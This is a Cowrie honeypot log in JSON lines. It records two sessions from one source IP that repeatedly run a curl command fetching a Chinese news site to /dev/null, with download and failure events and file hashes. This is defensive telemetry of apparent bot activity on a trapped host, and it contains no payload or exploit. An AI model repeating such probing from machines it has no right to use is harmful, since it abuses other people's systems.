{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.674388Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.691151Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.692461Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.695441Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.696393Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.704131Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.705194Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.720299Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.730794Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.732052Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.736240Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.737086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.744027Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.744858Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.771838Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.779718Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.780620Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.785498Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.786282Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.808735Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.824507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.825392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.828035Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.829632Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.830451Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.837188Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.870532Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.871454Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.873142Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.873948Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.878778Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.910307Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.911604Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.913659Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.914568Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.958642Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.959739Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.961921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.962754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.984243Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:51.994442Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.995418Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:51.999310Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.002242Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.003134Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.015019Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.039417Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.042835Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.043743Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.055357Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.056545Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.069101Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.085588Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.086404Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.098864Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.099808Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.116105Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.122535Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.123408Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.138775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.139696Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.142139Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.144177Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.159652Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.160626Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.172549Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.177822Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.178830Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.195871Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.196768Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.199226Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.202913Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.217436Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.218338Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.236708Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.237544Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.256274Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.257093Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.263608Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.269216Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.273422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.274260Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.293418Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.294256Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.309146Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.310779Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.311540Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.314276Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.332497Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.333306Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.348409Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.349280Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.370021Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.371702Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.372570Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.384563Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.385639Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.406208Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.409003Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.413391Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.415354Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.416655Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.421980Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.422767Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.456071Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.457232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:52.462043Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.463096Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.485750Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:52.488243Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
